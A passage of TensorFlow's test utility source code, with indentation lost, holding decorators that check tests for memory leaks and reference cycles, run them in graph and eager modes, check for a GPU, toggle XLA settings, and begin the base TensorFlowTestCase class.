collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the precense
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def use_deterministic_cudnn(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CUDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = os.environ.get("TF_CUDNN_DETERMINISTIC", "")
os.environ["TF_CUDNN_DETERMINISTIC"] = "true"
result = f(self, *args, **kwargs)
os.environ["TF_CUDNN_DETERMINISTIC"] = original_var
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tensorflow.TF_GetXlaConstantFoldingDisabled()
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
def no_xla_auto_jit_impl(func):
"""This test is not intended to be run with XLA auto jit enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Skip test if using XLA is forced.
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return no_xla_auto_jit_impl
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tensorflow.TF_SetXlaAutoJitMode("2")
pywrap_tensorflow.TF_SetXlaMinClusterSize(1)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(False)
pywrap_tensorflow.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
context.context().summary_writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
